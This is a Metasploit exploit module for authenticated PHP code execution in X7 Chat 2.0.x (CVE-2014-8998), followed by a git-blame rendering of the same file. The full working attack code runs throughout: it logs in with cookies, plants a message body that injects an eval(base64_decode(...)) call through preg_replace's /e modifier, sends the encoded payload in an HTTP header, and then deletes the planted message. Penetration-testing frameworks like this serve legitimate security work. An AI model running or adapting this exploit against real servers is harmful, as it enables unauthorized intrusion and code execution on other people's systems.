modules/exploits/multi/http/x7chat2_php_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
        'Description' => %q{
          This module exploits a post-auth vulnerability found in X7 Chat versions
          2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which
          uses preg_replace() function with the /e modifier. This allows a remote
          authenticated attacker to execute arbitrary PHP code in the remote machine.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Fernando Munoz <fernando[at]null-life.com>', # discovery & module development
          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
        ],
        'References' => [
          [ 'BID', '71014' ],
          [ 'CVE', '2014-8998' ],
          # Using this URL because isn't nothing else atm
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4076']
        ],
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [['Generic (PHP Payload)', {}]],
        'DisclosureDate' => '2014-10-27',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [ true, 'Username to authenticate as', '']),
        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', '']),
        OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
      ]
    )
  end

  def check
    res = exec_php('phpinfo(); die();', true)

    if res && res.body =~ /This program makes use of the Zend/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Unknown
    end
  end

  def exec_php(php_code, is_check = false)
    # remove comments, line breaks and spaces of php_code
    payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')

    # clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
    while Rex::Text.encode_base64(payload_clean) =~ /=/
      payload_clean = "#{payload_clean} "
    end
    payload_b64 = Rex::Text.encode_base64(payload_clean)

    cookie_x7c2u = "X7C2U=#{datastore['USERNAME']}"
    cookie_x7c2p = "X7C2P=#{Rex::Text.md5(datastore['PASSWORD'])}"
    rand_text = Rex::Text.rand_text_alpha_upper(5, 8)

    print_status("Trying for version 2.0.2 up to 2.0.5.1")
    print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'headers' => {
        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
      },
      'vars_get' => {
        # value compatible with 2.0.2 up to 2.0.5.1
        'act' => 'user_cp',
        'cp_page' => 'msgcenter',
        'to' => datastore['USERNAME'],
        'subject' => rand_text,
        'body' => "#{rand_text}www.{${eval(base64_decode($_SERVER[HTTP_#{rand_text}]))}}.c#{rand_text}",
      }
    })

    unless res && res.code == 200
      print_error("Sending the message (#{rand_text}) has failed")
      return false
    end

    if res.body =~ /([0-9]*)">#{rand_text}/
      message_id = Regexp.last_match[1]
      user_panel = 'user_cp'
    else
      print_error("Could not find message (#{rand_text}) in the message list")

      print_status("Retrying for version 2.0.0 up to 2.0.1 a1")
      print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'headers' => {
          'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
        },
        'vars_get' => {
          # value compatible with 2.0.0 up to 2.0.1 a1
          'act' => 'usercp',
          'cp_page' => 'msgcenter',
          'to' => datastore['USERNAME'],
          'subject' => rand_text,
          'body' => "#{rand_text}www.{${eval(base64_decode($_SERVER[HTTP_#{rand_text}]))}}.c#{rand_text}",
        }
      })

      unless res && res.code == 200
        print_error("Sending the message (#{rand_text}) has failed")
        return false
      end

      if res.body =~ /([0-9]*)">#{rand_text}/
        message_id = Regexp.last_match[1]
        user_panel = 'usercp'
      else
        print_error("Could not find message (#{rand_text}) in the message list")
        return false
      end
    end

    print_status("Accessing message (#{rand_text})")
    print_status("Sending payload in HTTP header '#{rand_text}'")

    if is_check
      timeout = 20
    else
      timeout = 3
    end

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'headers' => {
        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
        rand_text => payload_b64,
      },
      'vars_get' => {
        'act' => user_panel,
        'cp_page' => 'msgcenter',
        'read' => message_id,
      }
    }, timeout)

    res_payload = res

    print_status("Deleting message (#{rand_text})")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'headers' => {
        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
      },
      'vars_get' => {
        'act' => user_panel,
        'cp_page' => 'msgcenter',
        'delete' => message_id,
      }
    })

    if res && res.body =~ /The message has been deleted/
      print_good("Message (#{rand_text}) removed")
    else
      print_error("Removing message (#{rand_text}) has failed")
      return false
    end

    # if check return the response
    if is_check
      return res_payload
    else
      return true
    end
  end

  def exploit
    unless exec_php(payload.encoded)
      fail_with(Failure::Unknown, "#{peer} - Exploit failed, aborting.")
    end
  end
end
Add PHP Code Execution for X7 Chat 2.0.5 2014-10-27 01:01:31 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Add PHP Code Execution for X7 Chat 2.0.5 2014-10-27 01:01:31 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Switch ranking 2014-11-03 18:06:09 -06:00			`Rank = ExcellentRanking`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::PhpEXE`

			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',`
			`'Description' => %q{`
			`This module exploits a post-auth vulnerability found in X7 Chat versions`
			`2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which`
			`uses preg_replace() function with the /e modifier. This allows a remote`
			`authenticated attacker to execute arbitrary PHP code in the remote machine.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`'Fernando Munoz <fernando[at]null-life.com>', # discovery & module development`
			`'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'References' => [`
Revised 88 aux and exploit modules to add CVEs / references 2018-07-12 17:34:52 -05:00			`[ 'BID', '71014' ],`
			`[ 'CVE', '2014-8998' ],`
Add github pull request as reference 2014-11-03 18:18:42 -06:00			`# Using this URL because isn't nothing else atm`
			`['URL', 'https://github.com/rapid7/metasploit-framework/pull/4076']`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [['Generic (PHP Payload)', {}]],`
			`'DisclosureDate' => '2014-10-27',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`

			`register_options(`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`[`
			`OptString.new('USERNAME', [ true, 'Username to authenticate as', '']),`
			`OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', '']),`
			`OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`]`
			`)`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`end`

			`def check`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`res = exec_php('phpinfo(); die();', true)`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00
Do minor cleanup 2014-11-03 18:04:30 -06:00			`if res && res.body =~ /This program makes use of the Zend/`
			`return Exploit::CheckCode::Vulnerable`
			`else`
			`return Exploit::CheckCode::Unknown`
			`end`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`end`

Do minor cleanup 2014-11-03 18:04:30 -06:00			`def exec_php(php_code, is_check = false)`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`# remove comments, line breaks and spaces of php_code`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`payload_clean = php_code.gsub(/(\s+)\|(#.*)/, '')`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`# clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`while Rex::Text.encode_base64(payload_clean) =~ /=/`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`payload_clean = "#{payload_clean} "`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`end`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`payload_b64 = Rex::Text.encode_base64(payload_clean)`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`cookie_x7c2u = "X7C2U=#{datastore['USERNAME']}"`
			`cookie_x7c2p = "X7C2P=#{Rex::Text.md5(datastore['PASSWORD'])}"`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`rand_text = Rex::Text.rand_text_alpha_upper(5, 8)`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`print_status("Trying for version 2.0.2 up to 2.0.5.1")`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`res = send_request_cgi({`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'index.php'),`
			`'headers' => {`
			`'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`},`
			`'vars_get' => {`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`# value compatible with 2.0.2 up to 2.0.5.1`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'act' => 'user_cp',`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`'cp_page' => 'msgcenter',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'to' => datastore['USERNAME'],`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`'subject' => rand_text,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'body' => "#{rand_text}www.{${eval(base64_decode($_SERVER[HTTP_#{rand_text}]))}}.c#{rand_text}",`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`}`
			`})`

Do minor cleanup 2014-11-03 18:04:30 -06:00			`unless res && res.code == 200`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_error("Sending the message (#{rand_text}) has failed")`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`return false`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`end`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`if res.body =~ /([0-9]*)">#{rand_text}/`
Fix issues reported by wchen-r7 2014-10-28 21:30:08 -05:00			`message_id = Regexp.last_match[1]`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`user_panel = 'user_cp'`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`else`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_error("Could not find message (#{rand_text}) in the message list")`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00
			`print_status("Retrying for version 2.0.0 up to 2.0.1 a1")`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`res = send_request_cgi({`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'index.php'),`
			`'headers' => {`
			`'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`},`
			`'vars_get' => {`
			`# value compatible with 2.0.0 up to 2.0.1 a1`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'act' => 'usercp',`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`'cp_page' => 'msgcenter',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'to' => datastore['USERNAME'],`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`'subject' => rand_text,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'body' => "#{rand_text}www.{${eval(base64_decode($_SERVER[HTTP_#{rand_text}]))}}.c#{rand_text}",`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`}`
			`})`

Do minor cleanup 2014-11-03 18:04:30 -06:00			`unless res && res.code == 200`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_error("Sending the message (#{rand_text}) has failed")`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`return false`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`end`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`if res.body =~ /([0-9]*)">#{rand_text}/`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`message_id = Regexp.last_match[1]`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`user_panel = 'usercp'`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`else`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_error("Could not find message (#{rand_text}) in the message list")`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`return false`
Added compatibility with older versions, Updated descriptions and fixed issue with Ubuntu 12.04 2014-11-03 16:42:50 -05:00			`end`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`end`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_status("Accessing message (#{rand_text})")`
			`print_status("Sending payload in HTTP header '#{rand_text}'")`
Do minor cleanup 2014-11-03 18:04:30 -06:00
			`if is_check`
			`timeout = 20`
			`else`
			`timeout = 3`
			`end`

Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`res = send_request_cgi({`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'index.php'),`
			`'headers' => {`
			`'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`rand_text => payload_b64,`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'vars_get' => {`
			`'act' => user_panel,`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`'cp_page' => 'msgcenter',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'read' => message_id,`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`}`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`}, timeout)`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00
			`res_payload = res`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_status("Deleting message (#{rand_text})")`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`res = send_request_cgi({`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'method' => 'GET',`
			`'uri' => normalize_uri(target_uri.path, 'index.php'),`
			`'headers' => {`
			`'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`},`
			`'vars_get' => {`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'act' => user_panel,`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`'cp_page' => 'msgcenter',`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'delete' => message_id,`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`}`
			`})`

			`if res && res.body =~ /The message has been deleted/`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_good("Message (#{rand_text}) removed")`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`else`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`print_error("Removing message (#{rand_text}) has failed")`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`return false`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`end`

			`# if check return the response`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`if is_check`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`return res_payload`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`else`
			`return true`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`end`
			`end`

			`def exploit`
Do minor cleanup 2014-11-03 18:04:30 -06:00			`unless exec_php(payload.encoded)`
			`fail_with(Failure::Unknown, "#{peer} - Exploit failed, aborting.")`
			`end`
Fix issues reported by jvasquez 2014-10-27 19:15:39 -05:00			`end`
Add PHP Code Execution for X7 Chat 2.0.5 2014-10-27 01:01:31 -05:00			`end`